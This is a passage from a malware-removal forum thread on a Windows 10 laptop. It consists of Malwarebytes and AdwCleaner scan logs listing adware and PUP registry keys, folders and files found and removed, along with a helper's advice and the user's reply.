PUP.Optional.MixiDJToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{31E3431B-8F34-49CD-AE3D-992295E853A7}, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{31E3431B-8F34-49CD-AE3D-992295E853A7}, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\MixiDJ_V46 Toolbar, , [8a30077eabee270f0eb1d4227a88659b],

Registry Values: 22
PUP.Optional.NetRadio, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|NetRadio.exe, 11001, , [a4161d688514f343f06255242fd51be5]
PUP.Optional.NetRadio, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|NetRadio.vshost.exe, 11001, , [3b7f7f06d2c772c4ef645821798bab55]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [8d2d1a6bf3a667cfbe99270117ed8b75]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [8c2edfa6c8d1b4824710aa7e9b693cc4]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [eecc03820e8bc17530275ccc030142be]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [bffb265ff4a568ce1f38e543e61ec838]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr  |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [6a50bfc67920df57b3a582a619ebc63a]
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\FAST FREE CONVERTER|ffplugin_install, 1, , [d2e81b6a9bfea4923c4af60b4eb67f81]
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\CCIFDKGNONHKCMAOAPPJPMIJDHLPPGMG|path, C:\Users\Lexi\AppData\Local\CRE\ccifdkgnonhkcmaoappjpmijdhlppgmg.crx, , [2199f5906435d6601ba225f6679c50b0]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{59C7FC09-1C83-4648-B3E6-003D2BBC7481}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [b2084b3a9801d75feabdcb4657ad47b9]
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{840E3B68-A458-41B7-8D2C-5E02A27F442E}|AppPath, C:\Users\Lexi\AppData\Local\Conduit\CT3298582, , [cfebcabb5643bb7b58ecfcfcc93a817f]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{9170B96C-28D4-4626-8358-27E6CAEEF907}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [4e6ce79ee6b385b14166ec2525df6799]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{D1A71FA0-FF48-48dd-9B6D-7A13A3E42127}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [c7f3770ef0a9bf77a30428e948bc1be5]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{DDB1968E-EAD6-40fd-8DAE-FF14757F60C7}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [ba0035506d2ca98db8efdd3447bd8f71]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{F138D901-86F0-4383-99B6-9CDD406036DA}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [f3c7a8dd752444f2584f1ff2b252b947]
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|NetRadio.vshost.exe, 11001, , [a416790cd7c2b18592c150294fb5fa06]
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|NetRadio.exe, 11001, , [9228ed98c3d6b185afa3225736ce4ab6]
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SPPDCOM|TS, 2, , [7f3b86ff2c6dcb6bf13e3b30b450837d]
Trojan.Agent.Trace, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE|24d1ca9a-a864-4f7b-86fe-495eb56529d8, , [9d1d86ffb5e4a195d264073fed174bb5],
Trojan.Agent.Trace, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE|7bde84a2-f58f-46ec-9eac-f1f90fead080, , [8337d5b0e9b01422ce694600966e36ca],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\ccifdkgnonhkcmaoappjpmijdhlppgmg|path, C:\Users\Lexi\AppData\Local\CRE\ccifdkgnonhkcmaoappjpmijdhlppgmg.crx, , [8b2f473ee0b965d1932b74a78b78936d]
PUP.Optional.ProductSetup, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\PRODUCTSETUP|tb, 0T1J1E1B1J0S0S0X0K2W1D1M, , [edcd8ff657423bfbc8ffa9703ec6b44c]

Registry Data: 0
(No malicious items detected)

Folders: 19
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\Extensions, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\Extensions\FastFreeConverter, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverter, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\AddedAppDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\DetectedAppDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\EngineFirstTimeDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\NewSearchProtectorDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorBubbleDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorRetakeoverDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\ToolbarFirstTimeDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\ToolbarUntrustedAppsApprovalDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAddedAppDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAppApprovalDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAppPendingDialog, , [506aaadb584185b1eed311e5da28c23e],

Files: 46
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\FastFreeConverter.dll, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.ConduitTB.Gen, C:\Program Files (x86)\MixiDJ_V46\tbMixi.dll, , [6a500c79871242f47ddded3e55b0ef11],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\install.ico, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\uninstall.exe, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\Extensions\FastFreeConverter\content_script.js, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\uninstall_plugin.exe, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.SearchProtect.AppFlsh, C:\Windows\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, , [6a5024615049aa8c2aed89e211f3a45c],
PUP.Optional.SearchProtect.AppFlsh, C:\Windows\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb, , [ba005e272871082e2cecbead4aba35cb],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\hk64tbMixi.dll, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\hktbMixi.dll, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\ldrtbMixi.dll, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\prxtbMixi.dll, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\toolbar.cfg, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\uninstall.exe, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hk64tbMix0.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hk64tbMix2.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hk64tbMixi.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hktbMix0.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hktbMix2.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hktbMixi.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\ldrtbMix0.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\ldrtbMix2.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\ldrtbMixi.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\tbMix0.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\tbMix1.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\tbMix2.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\tbMixi.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\toolbar.cfg, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\DialogsAPI.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\excanvas.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\PIE.htc, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\settings.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\AddedAppDialog\app-added.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\DetectedAppDialog\app-2go.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\EngineFirstTimeDialog\EngineFirstTimeDialog.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\NewSearchProtectorDialog\SearchProtector.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorBubbleDialog\bubble.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorDialog\SearchProtector.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorRetakeoverDialog\SearchProtectorRetakeover.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\ToolbarFirstTimeDialog\ToolbarFirstTimeDialog.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\ToolbarUntrustedAppsApprovalDialog\ToolbarUntrustedAppsApprovalDialog.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAddedAppDialog\UT-app-dialog-added.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAppApprovalDialog\UT-app-dialog-needs-your-approval.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAppPendingDialog\UT-app-dialog-is-waiting.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.WinYahoo, C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\iwi8s34o.default\prefs.js, Good: (user_pref("browser.startup.homepage", ""https://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy), ,[f4c6d1b41881ef47a5afac91e61fb14f]

Physical Sectors: 0
(No malicious items detected)


(end)


There are no entries in that log which would have a detrimental effect on your system such as you mention. Let's start over: use System Restore again, and when your system is back to normal do not run Malwarebytes; run FRST and post two fresh logs, FRST.txt and Addition.txt. Let's see what gives....

If you look back at the fix done previously with FRST and Malwarebytes, your system was awash with malicious entries, PUPs, browser hijackers, infection and exploits..... You may be far better off formatting your hard drive and reinstalling Windows...


If it is all the same to you, I would prefer NOT to go through the full restore again. I would like to finish your former directions and see where it leads and then perhaps try the recovery tool. I do not believe the result from restoring it a 3rd time would be any different. This is an older laptop that is newly updated to Windows 10 from Vista, so it is possible that Windows 10 is not stable for some reason (my main PC is in the shop due to a touch screen issue). I would like to proceed with the other steps you listed to remove items from my computer. I did attempt to do a full uninstall of Malwarebytes, but it did not restore the start menu.

My AdwCleaner log is here:

# AdwCleaner v5.101 - Logfile created 09/03/2016 at 16:34:24
# Updated 07/03/2016 by Xplode
# Database : 2016-03-08.1 [server]
# Operating system : Windows 10 Home  (x64)
# Username : Lexi - DURABLE
# Running from : C:\Users\Lexi\Downloads\AdwCleaner.exe
# Option : Clean
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files (x86)\Coupons
[-] Folder Deleted : C:\Program Files (x86)\File Type Helper
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
[-] Folder Deleted : C:\Users\Lexi\AppData\Roaming\pccustubinstaller
[-] Folder Deleted : C:\WINDOWS\SysWOW64\C2MP

***** [ Files ] *****


***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKCU\Software\APN PIP
[-] Key Deleted : HKCU\Software\BackgroundContainer
[-] Key Deleted : HKCU\Software\FunWebProducts
[-] Key Deleted : HKCU\Software\MyWebSearch
[-] Key Deleted : HKCU\Software\Zugo
[-] Key Deleted : HKCU\Software\AppDataLow\Toolbar
[-] Key Deleted : HKCU\Software\AppDataLow\Software\BackgroundContainer
[-] Key Deleted : HKCU\Software\AppDataLow\Software\MyWebSearch
[-] Key Deleted : HKLM\SOFTWARE\FocusInteractive
[-] Key Deleted : HKLM\SOFTWARE\Fun Web Products
[-] Key Deleted : HKLM\SOFTWARE\MyWebSearch
[-] Key Deleted : HKLM\SOFTWARE\PIP
[-] Key Deleted : HKLM\SOFTWARE\W3I
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
[#] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\conduit.com

***** [ Web browsers ] *****

[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : search.mywebsearch.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : websearch.ask.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : ask.com__
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : search.conduit.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : wayfair.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : ask.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : aol.com

*************************

:: "Tracing" keys removed
:: Winsock settings cleared

*************************

C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [7947 bytes] - [09/03/2016 16:34:24]
C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [15225 bytes] - [08/03/2016 09:47:39]

########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [8134 bytes] ##########
 


# AdwCleaner v5.101 - Logfile created 08/03/2016 at 09:47:39
# Updated 07/03/2016 by Xplode
# Database : 2016-03-08.1 [server]
# Operating system : Windows 10 Home  (x64)
# Username : Lexi - DURABLE
# Running from : C:\Users\Lexi\Downloads\AdwCleaner.exe
# Option : Scan
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

Folder Found : C:\Program Files (x86)\Coupons
Folder Found : C:\Program Files (x86)\File Type Helper
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
Folder Found : C:\Users\Lexi\AppData\LocalLow\Conduit
Folder Found : C:\Users\Lexi\AppData\Roaming\pccustubinstaller
Folder Found : C:\WINDOWS\SysWOW64\C2MP

***** [ Files ] *****

File Found : C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage
File Found : C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage-journal

***** [ DLL ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

Task Found : {7E7D0F47-0A78-0E0A-7A11-047E0C7E1178}

***** [ Registry ] *****

Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\BackgroundContainer
Key Found : HKCU\Software\FunWebProducts
Key Found : HKCU\Software\MyWebSearch
Key Found : HKCU\Software\Zugo
Key Found : HKCU\Software\AppDataLow\Toolbar
Key Found : HKCU\Software\AppDataLow\Software\BackgroundContainer
Key Found : HKCU\Software\AppDataLow\Software\MyWebSearch
Key Found : HKLM\SOFTWARE\FocusInteractive
Key Found : HKLM\SOFTWARE\Fun Web Products
Key Found : HKLM\SOFTWARE\MyWebSearch
Key Found : HKLM\SOFTWARE\PIP
Key Found : HKLM\SOFTWARE\W3I
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}
Key Found : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
Key Found : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Data Found : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\conduit.com

***** [ Web browsers ] *****


*************************

C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [7141 bytes] - [08/03/2016 09:47:39]

########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [7234 bytes] ##########

# AdwCleaner v5.101 - Logfile created 09/03/2016 at 16:26:08
# Updated 07/03/2016 by Xplode
# Database : 2016-03-08.1 [server]
# Operating system : Windows 10 Home  (x64)
# Username : Lexi - DURABLE
# Running from : C:\Users\Lexi\Downloads\AdwCleaner.exe
# Option : Scan
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

Folder Found : C:\Program Files (x86)\Coupons
Folder Found : C:\Program Files (x86)\File Type Helper
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
Folder Found : C:\Users\Lexi\AppData\Roaming\pccustubinstaller
Folder Found : C:\WINDOWS\SysWOW64\C2MP

***** [ Files ] *****


***** [ DLL ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\BackgroundContainer
Key Found : HKCU\Software\FunWebProducts
Key Found : HKCU\Software\MyWebSearch
Key Found : HKCU\Software\Zugo
Key Found : HKCU\Software\AppDataLow\Toolbar
Key Found : HKCU\Software\AppDataLow\Software\BackgroundContainer
Key Found : HKCU\Software\AppDataLow\Software\MyWebSearch
Key Found : HKLM\SOFTWARE\FocusInteractive
Key Found : HKLM\SOFTWARE\Fun Web Products
Key Found : HKLM\SOFTWARE\MyWebSearch
Key Found : HKLM\SOFTWARE\PIP
Key Found : HKLM\SOFTWARE\W3I
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}
Key Found : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
Key Found : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\conduit.com

***** [ Web browsers ] *****

[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : search.mywebsearch.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : websearch.ask.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : ask.com__
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : search.conduit.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : wayfair.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : ask.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : aol.com

*************************

C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [14867 bytes] - [08/03/2016 09:47:39]

